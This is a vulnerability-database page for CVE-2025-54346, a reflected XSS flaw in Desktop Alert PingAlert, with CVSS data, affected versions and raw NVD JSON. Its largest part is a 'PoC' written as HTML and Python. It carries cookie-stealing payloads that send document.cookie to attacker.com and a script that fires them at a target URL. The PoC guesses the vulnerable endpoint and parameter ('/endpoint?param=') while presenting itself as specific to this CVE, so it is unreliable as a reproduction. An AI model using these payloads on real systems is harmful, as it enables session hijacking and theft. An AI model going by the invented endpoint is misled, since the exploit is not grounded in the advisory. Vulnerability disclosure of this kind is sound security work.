Security Vulnerability Report
中文
CVE-2025-54346 CVSS 7.6 HIGH

CVE-2025-54346

Published: 2025-11-14 18:15:49
Last Modified: 2025-11-20 14:59:38
Source: [email protected]

Description

A Reflected Cross Site Scripting (XSS) vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to hijack user’s browser, capturing sensitive information.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.0.12
Desktop Alert PingAlert 6.1.0.13
Desktop Alert PingAlert 6.1.0.14
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-54346 PoC: Reflected XSS in Desktop Alert PingAlert --> <!-- Target: Desktop Alert PingAlert Application Server (v6.1.0.11 - v6.1.1.2) --> <!-- Attack Vector: Malicious URL with embedded JavaScript payload --> <!DOCTYPE html> <html> <head> <title>CVE-2025-54346 PoC</title> </head> <body> <h1>Reflected XSS PoC for CVE-2025-54346</h1> <p>Target: Desktop Alert PingAlert Application Server</p> <p>Vulnerable Versions: 6.1.0.11 to 6.1.1.2</p> <h2>Attack URL:</h2> <textarea id="attackUrl" rows="3" cols="80" readonly></textarea> <h2>Payload Examples:</h2> <ul> <li><strong>Cookie Theft:</strong> <code>&lt;script&gt;fetch('https://attacker.com/steal?c='+document.cookie)&lt;/script&gt;</code></li> <li><strong>Session Hijacking:</strong> <code>&lt;img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))"/&gt;</code></li> <li><strong>DOM Manipulation:</strong> <code>&lt;script&gt;document.body.innerHTML='&lt;h1&gt;Phished&lt;/h1&gt;'&lt;/script&gt;</code></li> </ul> <h2>Manual Test URL:</h2> <p>Replace VICTIM_DOMAIN with actual target server:</p> <code id="manualUrl"></code> <script> // Base URL - Modify this to target vulnerable server var baseUrl = "http://VICTIM_DOMAIN/pingalert"; // XSS payloads var payloads = [ "<script>alert('XSS Vulnerable - CVE-2025-54346')</script>", "<script>console.log(document.cookie)</script>", "<img src=x onerror='alert(document.domain)'/>", "<svg/onload=fetch(\"https://attacker.com/steal?\"+document.cookie)>" ]; // Generate test URLs (assuming vulnerable parameter like 'msg' or 'alert') var testUrl = baseUrl + "/endpoint?param=" + encodeURIComponent(payloads[0]); document.getElementById("attackUrl").value = testUrl; document.getElementById("manualUrl").textContent = testUrl; // Auto-generate all payloads console.log("=== CVE-2025-54346 Test Payloads ==="); payloads.forEach(function(payload, index) { console.log("Payload " + (index+1) + ": " + baseUrl + "/endpoint?param=" + encodeURIComponent(payload)); }); </script> <h2>Python PoC Script:</h2> <pre> import requests from urllib.parse import quote # Target configuration TARGET_URL = "http://target-server/pingalert/endpoint" payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' # Send malicious request params = {"param": payload} response = requests.get(TARGET_URL, params=params) print(f"Request sent to: {response.url}") print(f"Status: {response.status_code}") print("Check if payload is reflected in response without encoding") </pre> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54346", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:48.897", "lastModified": "2025-11-20T14:59:38.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross Site Scripting (XSS) vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows an attacker to hijack user’s browser, capturing sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.4", "matchCriteriaId": "3CE54623-DECB-4213-B299-40AAE561D3E2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54346/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.